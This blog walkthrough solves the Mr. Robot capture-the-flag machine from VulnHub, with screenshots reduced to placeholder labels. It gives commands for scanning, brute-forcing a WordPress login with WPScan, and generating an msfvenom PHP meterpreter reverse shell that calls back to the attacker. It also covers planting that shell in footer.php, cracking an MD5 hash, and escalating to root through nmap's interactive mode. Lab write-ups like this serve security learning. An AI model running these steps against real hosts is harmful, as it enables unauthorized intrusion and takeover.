Mr. Robot – CTF

This is my walk-through of the Mr. Robot CTF challenge posted on vulnhub.com. All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law.  Be smart folks, and enjoy the walk-through.

Full NMAP scan of host:

root@kali:~# nmap -p- -A 192.168.1.224

robot1

The NMAP scan shows port 80 & 443 open.  A quick check with a browser:  Lots to read, and videos too:

robot2

A Nikto scan against port 80 tell us that the site is running WordPress, and there is a robots.txt file:

root@kali:~# nikto -h http://192.168.1.224

robot3

Using Curl to view robots.txt:

root@kali:~# curl -i -L http://192.168.1.224/robots.txt

robot4

The robots.txt file contains 2 entries.  Our first key, and a dictionary file.

Using Curl to view our first key:

root@kali:~# curl -i -L http://192.168.1.224/key-1-of-3.txt

robot5

Downloading the dictionary file using Wget:

root@kali:~/Downloads# wget http://192.168.1.224/fsocity.dic

robot6

So we have our first key, where to now? I know that the site is running WordPress and I have a dictionary file that I will assume contains the password for a WordPress user.  I ran WPscan and didn’t find anything of use.  I tried to enumerate users using both WPscan and Metasploit but no luck.  I tried to brute force the admin user with the dictionary file I downloaded, but that did not work either.  So now what?

I went back and revisited the website, watched all the videos and viewed the source of all of the pages and I found something of interest.  Go back to the main site and type prepare and watch the video:

robot7

The video makes reference to a website, whoismrrobot.com.  I visited the site and something that stood out on the main page, the name Elliot is listed as a command.  Elliot is the main character in the series.  I think we have found our WordPress user:

robot8

I used WPscan to brute force the password for elliot using the dictionary I previously downloaded. This took several hours, but it worked. Elliot’s password is ER28-0652:

root@kali:~# wpscan -u http://192.168.1.224 –wordlist /root/Downloads/fsocity.dic –username elliot -t 10

robot9

robot10

Logged into WordPress using Elliot’s credentials:

robot11

Elliot is has admin privileges in WordPress. An easy way to get a shell is to create PHP reverse shellcode using Msfvenom and add it one of WordPress PHP files. In my case I will add my PHP code to footer.php.

Creating reverse shellcode using Msfvenom:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.233 LPORT=443 -f raw

robot12

Pasting my PHP code into the footer.php file.  You can navigate here by clicking on appearance–>editor–>footer.php:

robot13

Now that I have the shellcode in place, I fire up my Metasploit handler to receive the shell.  You can see my options below:

robot14

I execute the shellcode using Curl:

robot15

Received the shell with Metasploit:

robot16

So now I have a low privilege shell. Poking around a bit, I find key 2 but I don’t have privileges to view it.  I also find a file that contains the username robot and a MD5 password hash:

robot17

I use the hashkiller website to crack the hash. The password for robot is abcdefghijklmnopqrstuvwxyz:

robot18

I su to robot ,and I am able to view key 2:

robot19

Poking around a bit more.  There is a root folder.  I am assuming key 3 is there, so we need to escalate privileges on this host.  I download the linuxprivchecker.py file to the host and run it. Immediately, I find something interesting:

robot20

I run NMAP in interactive mode and drop to a !sh with root privileges.  I find key 3 in the root folder as expected:

robot@linux:/tmp$ nmap –interactive

robot21

Hope you found this helpful 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s